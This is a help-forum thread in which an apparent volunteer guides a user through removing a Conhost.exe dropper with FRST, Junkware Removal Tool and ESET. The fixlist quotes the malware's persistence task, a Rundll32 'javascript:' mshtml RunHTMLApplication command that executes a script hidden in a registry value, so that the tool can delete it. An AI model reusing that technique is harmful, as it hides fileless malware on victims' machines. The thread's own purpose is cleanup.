win32:Dropper-gen [Drp] - Conhost.exe

Im sorry if this was brought up millions of times, but I’m horrible when it comes to PC due to unfortunate circumstances, so I need help knowing in whether or not this is a problem or just a false positive. So I have this job online where I write articles, and I tend to have multiple tabs open, usually with each one representing an article im about to do on it. So I’m doing this, and suddenly I get a virus alert from avast - im sorry I didn’t think to take a screenshot since most viruses disappear after I choose delete - but I believe what it mentioned was “win32:Dropper-gen [Drp]”. When I chose to delete the infected file, another popped up for the same file, I chose the same option and continued doing what I was doing. A couple minutes later I get another 2 popups for the same thing - which has made me suspicious and led me to believe that this might be a virus that’s going to require more in terms of knowledge… something I lack greatly of.

So I put the thing in my virus chest (that’s safe right?) and am unsure what to do. I read a previous post on the avast forum stating that virus alerts concerning “win32:Dropper-gen [Drp]” are fine so long as they are from c:\hp\documentation\ops_shortcut.exe but mine hails from C:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Additionally, it states the name is “Conhost.exe”. 274944 is the filesize if that helps at all. I also had another one that came from C:\Windows\TEMP. When I scan it, all I get is: “Conhost.exe win32:Dropper-gen [Drp]”. A couple seconds afterwards I got another virus pop up. (I managed to get a screenshot of one, pictured below)

Again I apologize for my insufficiency about this sort of thing. My father used to do all this for me and was pretty genius, I on the other hand never learned anything, something I feel bad about - and yet he is no longer among the living. Any help would be greatly appreciated. Thank you.

EDIT: I’ve added my logs as suggested by the link given to me.

https://forum.avast.com/index.php?topic=53253.0

Screenshots can be attached here, below the txt box you find… attachments and other options

Thank you, normally I search message boards for pinned topics and such, but I considering my paranoia amongst other things I had immediately opted to posting as soon as possible.

EDIT: Finishing up my logs now with aswMBR, 3 of my logs have been attached to the main post, when my aswMBR log is done, ill attach it to this post because of the 4 attachment limit.

You dont have to redo it…
It is much easier to find your logs when you attach them in your reply instead of going back and edit your previous post and attach
And if not able to attach all in one, just make a new reply and attach next :wink:

I see. Thank you. My logs so far, as per your advice! It seems malware bytes has the most straightforward result. I sincerely hope that my problem can be solved.

Ive run adwcleaner as well, and it has revealed more infections in my registry… apparently adwcleaner has a “clean” option as well - would that be something I should try to use?

I don’t suppose the few people who have looked have had any luck on what I’ve got and how to get rid of it?

  • Step #1 Fix with FRST
    Make sure that you still have FRST.exe on your Desktop. If you do not have it, download the suitable version from here to your Desktop.
    [li]Open Notepad.exe. Do not use any other text editor software;
    - Copy and Paste the contents inside the code-box to your Notepad
    [/li]
Start
Closeprocesses:
Emptytemp:
Task: {233E7D53-3082-40AA-8664-A8D13B9A8F00} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
AlternateDataStreams: C:\ProgramData\Microsoft:6yHkzq7ppWVsirfHBp73Pxb
AlternateDataStreams: C:\ProgramData\Microsoft:Yyean2t4SAfeZ5oaIfY1
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
End
  •   [li]Click on [b]File[/b] > [b]Save as...[/b]
    

[list]
[li]Inside the File Name box type fixlist.txt
- From the Save as type drop down list, choose All Files
[/li]
- Save the file to your Desktop;
- Re-run FRST.exe and click Fix;

		[li][b]Note[/b]: If FRST advises there is a new updated version to be downloaded, do so/allow this.
	[/li]
	- After the completion, a log will be produced;
	- Attach the log in your next reply.
[/list][/li]

  • Step #2 Fix with Junkware Removal Tool
    Download Junkware Removal Tool by thisisu to your Desktop from the link below.
    Download Link 1
    Download Link 2

      [li]Disable your anti-virus to avoid potential conflicts. For more information please acknowledge yourself [url=http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/]this[/url] article;
      - Run the program either by double-clicking(Windows XP) or Right-clicking and choosing [i]Run as administrator[/i](Windows Vista and above);
      - Please be patient as the tool cleans your system;
      - After completion of the process a log named [b]JRT.txt[/b] will automatically open and is save to your Desktop;
      - Attach the log in your next reply.
    

    [/li]


  • Step #3 ESET Online Scanner
    Disable your security programs which includes but not limited to anti-virus, anti-malware, anti-spyware et cetera. Peruse this for additional information.

      [li]Download [b]esetsmartinstaller_enu.exe[/b] by clicking [url=http://download.eset.com/special/eos/esetsmartinstaller_enu.exe][b]here[/b][/url].
      - Right-click on the program and choose [i]Run as administrator[/i].
      - Accept their terms and condition and proceed.
      - Install [b]Add-On/Active X[/b] if prompted.
      - From the [b]Computer Scan Setting[/b] --
    

[list]
[li]Enable detection of potentially unwanted application
[/li]
- Click on Advanced Setting

		[li]Check the following box --
		- [list]
			[li][b]Remove Found Threats[/b]
		[/li]
	[/list]
		- Check the following boxes --
		- [list]
			[li][b]Scan archives[/b];
			- [b]Scan for potentially unsafe applications[/b]
			- [b]Enable Anti-Stealth Technology[/b]
		[/li]
	[/list][/li]
	- Click on [b]Start[/b] and wait for the [b]virus signature database[/b] to update.
	- The online scan will begin [i]automatically[/i] and can take several hours.

		[li][b]Note:[/b] Do not touch either the Mouse or keyboard during the scan. Otherwise it may stall.
	[/li]
	- After the Scan finishes --
	- 
		[li][b]If no threats were found:[/b]

[list]
[li]Put a checkmark in Uninstall application on close.
- Close the program and report that nothing was found
[/li]
- If threats were found:

			[li]Open the file located in [b]C:\Program Files\ESET\ESET Online Scanner\log.txt[/b] (32-bit) or [b]C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt[/b] (64-bit).
			- Attach the log file in your next reply.
		[/li]
	[/list][/li]
[/list][b]Note:[/b] Enable your security programs afterwards.[/li]

  • Required Log(s):

      [li]FRST Fix Log
      - Junkware Remocval Tool Log
      - ESET Log
    

    [/li]
    Regards,
    Valinorum

Detected nothing with ESET Online Scanner, so just the JRT and Fixlog. Also, I forgot to mention that I did quarantine the infected files in my Avast’s virus chest - should I have taken them out before I had done all that?

should I have taken them out before I had done all that?
Of course not. We do not wish a re-infection.

How is your PC?

well, since I quarantined the files, I haven’t had any popups, which were the only real physical indication that something was wrong. I scanned all the files in my virus chest before I did what you suggested and they would usually make a popup appear after a second it was done scanning. I scanned the files again, and I didn’t seem to get a popup, so maybe they’re okay now? Additionally, ADWCleaner has still found some suspicious things in my registry:

Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : [x64] HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID{6DDA37BA-0553-499A-AE0D-BEBA67204548}

I don’t use Yahoo Toolbar btw.

Don’t mean to doublepost, but I just wanted affirmation on my previous post. Thank you.

Please, use the Clean option of AdwCleaner. It will remove the keys and post a fresh FRST scan log for my perusal.

I cleaned with the program, log says the files were disposed of. Scanned again afterwards, nothing else came up, so I guess im good to go then. I guess its probably safe to remove those files from my avast’s virus chest too. Thanks for the help!

Post the FRST scan log just to be sure that nothing is left unattended.